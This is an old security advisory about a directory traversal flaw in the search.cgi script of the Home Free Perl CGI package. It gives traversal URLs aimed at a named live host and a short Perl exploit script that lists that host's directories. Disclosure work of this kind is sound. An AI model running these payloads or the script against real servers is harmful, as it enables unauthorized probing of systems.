Another search.cgi vulnerability

[k0adk1d () HOTMAIL COM (k0ad k1d)]

==============================================================================

    #!/bin/csh security advisory
    ----------------------------

           Title  :  Vulnerabilities in the SolutionScripts.com
                     Home Free CGI package.

    Advisory Ref  :  csh-adv:04.01.2000-CGI-HomeFree-01

         Credits  :  fzx, omnihil, the guys in !el8
                     DSKZ, M0D

==============================================================================

Introduction
------------

SolutionScripts.com is a vendor of Perl CGI scripts for all platforms that
support the language (WinNT, Linux, various Unix flavors). Home Free is a
package developed and marketed by SolutionScripts.com, below is an extract
from their website.

     "Home Free is the ultimate community building program. Allowing you
      to give your visitors a free web site on your server. With complete
      control over every aspect of your free web site program, you can
      grow page views, revenue and brand awareness for your site."

      http://solutionscripts.com/vault/homefree/index.shtml

Home Free is used by many popular websites. It allows users to set up and
maintain their websites through a series of CGI scripts without posing a
threat to system security.

Details
-------

Home Free consists of the following files from an end-user point of view :-

     ./features.cgi
     ./new.cgi
     ./search.cgi
     ./signup.cgi
     ./user_files.cgi
     ./user_formmail.cgi
     ./user_ftp_import.cgi
     ./user_gbook.cgi
     ./user_manage.cgi
     ./user_pref.cgi
     ./user_uploads.cgi
     ./user_wwwboard.cgi

There are also various 'admin' CGI scripts in the package, such as :-

     ./admin.cgi
     ./admin_browse.cgi
     ./admin_cata.cgi
     ./admin_email.cgi
     ./admin_features.cgi
     ./admin_setup.cgi
     ./admin_update.cgi

Vulnerabilities Identified
--------------------------

     ./search.cgi

     The search.cgi script uses the following input variables :-

       letter=any string
       cata=any string
       perpage=any string
       start=any string
       boolean=or/and
       advanced

     This CGI script can be exploited to view directory listings on the host
     server. A vulnerability exists because of insufficient bounds checking
     of the 'letter' variable when it is parsed by the search.cgi script,
     for example :-

http://members.antionline.com/cgi-bin/search.cgi?letter=..\..\..\..\winnt

     The above URL will list the \winnt directory of the host. The
search.cgi
     script also seems to read and display the first line of each file
     (network.wri, et al). We have been unable to use the search.cgi script
     or any of the other scripts in the package to view files to date.

     If we had access to the source code of these Perl scripts, I'm sure
that
     many security problems would be identified.

     You can also exploit the vulnerability to view other directory
listings,
     such as the /cgi-bin directory under Apache.

http://members.antionline.com/cgi-bin/search.cgi?letter=..\..\..\..\apache\cgi-bin

     We also took the time in writing a short Perl script to display the
     directory listings of vulnerable servers :

     --8<-- snip --8<-- snip --8<-- snip --8<-- snip --8<-- snip --8<-- snip

     #!/usr/bin/perl
     #
     # Quick exploit of the Home Free ./search.cgi script, allows you to
list
     # directories on the host.
     #
     # Default server is antionline's, change as appropriate.
     #

     use IO::Socket;

     if ($ARGV[0] eq "") { die "no argument\n"; }

     $asoc = IO::Socket::INET->new(Proto     => "tcp",
                                   PeerAddr  => "members.antionline.com",
                                   PeerPort  => 80) ||
                     die "can't connect to host: $!";

     select($asoc);
     $| = 1;

     print $asoc "GET
/cgi-bin/search.cgi?letter=..\\..\\..\\..\\$ARGV[0]&start=1&perpage=all
HTTP/1.0\n\n";

     while(<$asoc>) {
             if ($_ =~ /.+HREF.+TD.+/) {
                     @parts = split("\"", $_);
                     $foo = $parts[1];
                     @parts = split("/", $foo);
                     print STDOUT $parts[3];
                     print STDOUT "\n";
             }
     }
     close(ASOC);

     --8<-- snip --8<-- snip --8<-- snip --8<-- snip --8<-- snip --8<-- snip

  Other smaller problems were identified when testing the bounds checking
and
  flexibility of the other scripts, such as user_manage.cgi. Without access
to
  the source code of the Perl scripts in question, it is very difficult to
  know the security implications of such problems. We'll leave that up to
  the vendor to look into and patch.

==============================================================================

    #!/bin/csh security advisory
    ----------------------------

           Title  :  Vulnerabilities in the SolutionScripts.com
                     Home Free CGI package.

    Advisory Ref  :  csh-adv:01.04.2000-CGI-HomeFree-01

         Credits  :  fzx, omnihil, the guys in !el8
                     DSKZ, M0D

==============================================================================

______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com